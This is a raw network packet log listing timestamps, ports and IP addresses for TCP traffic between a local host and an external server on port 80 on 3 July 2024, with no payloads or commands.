Jul 3, 2024 18:09:06.382798910 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382811069 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382811069 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.382824898 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382827997 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.382837057 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382859945 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.382863998 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382878065 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382886887 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.382891893 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382903099 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382906914 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.382915020 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.382925987 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.382955074 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.384259939 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.384272099 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.384284019 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.384308100 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.384339094 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.384390116 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.384401083 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.384413004 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.384426117 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.384434938 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.384464979 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.384603977 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.384613991 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.384629965 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.384643078 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.384651899 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.384691000 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.384752035 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.384764910 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.384776115 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.384797096 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.384808064 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.384819984 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.384820938 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.384834051 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.384845018 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.384845972 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.384857893 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.384859085 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.384871006 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.384875059 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.384906054 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.384928942 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.385121107 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385149002 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385159016 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385166883 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.385173082 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385175943 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.385188103 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385198116 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.385202885 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385210991 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.385215998 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385227919 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.385248899 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.385271072 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.385484934 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385494947 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385505915 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385515928 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385525942 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385529041 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.385546923 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385554075 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.385581970 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385591030 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.385592937 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385606050 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385616064 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.385617971 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385629892 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385632992 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.385641098 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385653019 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385656118 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.385670900 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.385679960 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385694027 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385704041 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.385709047 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385721922 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385732889 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385735989 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.385745049 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385756969 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385773897 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.385785103 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385797977 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.385816097 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.385849953 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.386425018 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386435986 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386445999 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386456966 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386472940 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.386475086 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386488914 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386495113 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.386502981 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386524916 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.386531115 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386543989 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386554003 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386558056 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.386568069 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386579990 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386585951 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.386590958 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386604071 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386607885 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.386615992 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386624098 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.386629105 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386661053 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.386662960 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386677027 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386687040 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.386688948 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386699915 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386713028 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386713028 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.386725903 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386737108 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.386749983 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.386768103 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.386790037 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.387362957 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387375116 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387387037 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387408972 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.387427092 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.387427092 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387439013 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387449980 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387460947 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387464046 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.387471914 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387482882 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387492895 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387495041 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.387520075 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387527943 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.387531996 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387540102 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.387545109 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387557030 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387567997 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387574911 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.387579918 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387592077 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387607098 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.387610912 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387631893 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.387635946 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387644053 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.387649059 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387660980 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387671947 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387674093 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.387685061 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.387706995 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.387737036 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.388303041 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388314009 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388324976 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388334990 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388344049 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.388355017 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388366938 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.388370037 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388386011 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388398886 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388406992 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.388422966 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388422966 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.388436079 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388438940 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.388448000 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388461113 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388467073 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.388475895 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388488054 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.388499975 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388525963 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.388535023 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388535976 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.388547897 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388559103 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388570070 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388578892 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.388581991 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388588905 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.388596058 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388607025 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388617992 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388627052 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388629913 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.388649940 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.388658047 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.388669014 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.388691902 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.389247894 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389260054 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389280081 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389292002 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.389298916 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389308929 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.389309883 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389322996 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389326096 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.389349937 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.389349937 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389364004 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389374971 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389380932 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.389385939 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389398098 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389409065 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389414072 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.389420033 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389440060 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.389441013 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389456034 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.389466047 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389477968 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389487982 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.389489889 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389497042 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.389504910 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389517069 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389523983 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.389528990 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389539957 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389555931 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.389566898 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389578104 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.389585972 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.389609098 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.389630079 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.390038013 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.390052080 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.390068054 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.390079021 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.390086889 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.390101910 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.390122890 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.390186071 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.390198946 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.390213966 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.390233040 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.390239000 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.390250921 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.390264034 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.390269995 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.390279055 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.390292883 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.390292883 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.390307903 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.390309095 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.390336037 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.390341043 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.390353918 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.390360117 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.390366077 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.390377998 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.390391111 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.390392065 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.390403032 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.390407085 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.390444040 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.390470028 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.420917034 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.420933962 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.420952082 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.420973063 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.420996904 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.421021938 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421034098 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421046019 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421056986 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421067953 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.421098948 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.421158075 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421169043 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421180010 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421204090 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.421222925 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.421263933 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421276093 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421288013 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421298027 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421308994 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.421308994 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421322107 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421339035 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.421367884 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.421546936 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421561956 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421586990 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421592951 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.421598911 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421618938 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.421638966 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.421701908 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421714067 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421724081 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421740055 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421751022 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421751976 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.421763897 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421766043 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.421778917 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421794891 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.421804905 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421809912 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.421817064 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421828985 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421839952 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421842098 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.421852112 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421863079 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421865940 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.421875000 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.421900034 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.421921015 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.486589909 CEST	80	62923	77.91.77.81	192.168.2.6
